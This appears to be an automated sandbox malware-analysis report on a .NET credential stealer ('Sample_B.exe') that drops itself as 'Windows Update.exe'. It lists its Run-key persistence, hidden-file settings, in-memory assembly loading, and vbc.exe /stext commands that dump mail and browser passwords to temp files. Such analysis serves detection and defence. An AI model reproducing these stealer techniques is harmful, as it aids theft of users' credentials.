                          Source: Windows Update.exe.0.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: Sample_B.exe, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/15@6/2
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00644FBA AdjustTokenPrivileges,2_2_00644FBA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00644F83 AdjustTokenPrivileges,2_2_00644F83
                          Source: C:\Users\user\Desktop\Sample_B.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                          Source: C:\Users\user\Desktop\Sample_B.exeFile created: C:\Users\user\AppData\Local\Temp\SysInfo.txtJump to behavior
                          Source: Sample_B.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\Sample_B.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                          Source: C:\Users\user\Desktop\Sample_B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Windows Update.exe, 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: Sample_B.exe, Windows Update.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: Sample_B.exeString found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
                          Source: C:\Users\user\Desktop\Sample_B.exeFile read: C:\Users\user\Desktop\Sample_B.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Sample_B.exe 'C:\Users\user\Desktop\Sample_B.exe'
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe' Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeAutomated click: OK
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Sample_B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                          Source: Sample_B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: C:\Users\user\Desktop\Sample_B.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior
                          Source: Sample_B.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: pC:\Win.pdbassembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: F^symbols\dll\mscorlib.pdb^ source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: .pdb; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: ^indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: mscorlib.pdbs\AppData\Roaming\Windows Update.exe source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: C:\Windows\mscorlib.pdb8 source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Sample_B.exe
                          Source: Binary string: dows\mC:\Users\user\AppData\Roaming__b77a5c561934e089\mscorlib.pdbne_d08cc06a442b34fc source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmp
                          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Sample_B.exe
                          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Sample_B.exe
                          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbFP source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: ^T3/pC:\Windows\mscorlib.pdb4 source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
                          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
                          Source: Binary string: mscorrc.pdb source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2111699782.0000000000E70000.00000002.00000001.sdmp

                          Data Obfuscation:

                          barindex
                          .NET source code contains potential unpackerShow sources
                          Source: Sample_B.exe, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Sample_B.exe, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Sample_B.exe, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Sample_B.exe, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Windows Update.exe.0.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Windows Update.exe.0.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Windows Update.exe.0.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: Windows Update.exe.0.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: WindowsUpdate.exe.2.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: WindowsUpdate.exe.2.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: WindowsUpdate.exe.2.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: WindowsUpdate.exe.2.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C30712 push eax; ret 0_2_00C30726
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C30712 push eax; ret 0_2_00C3074E
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C0B87E push ecx; ret 0_2_00C0B88E
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C0BA9D push eax; ret 0_2_00C0BAB1
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C0BA9D push eax; ret 0_2_00C0BAD9
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F50712 push eax; ret 2_2_00F50726
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F50712 push eax; ret 2_2_00F5074E
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F2B87E push ecx; ret 2_2_00F2B88E
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F2BA9D push eax; ret 2_2_00F2BAB1
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F2BA9D push eax; ret 2_2_00F2BAD9
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_001A7ED2 push eax; ret 2_2_001A7ED5
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_001A76C5 push esp; retf 2_2_001A76C6
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Sample_B.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Changes the view of files in windows explorer (hidden files and folders)Show sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
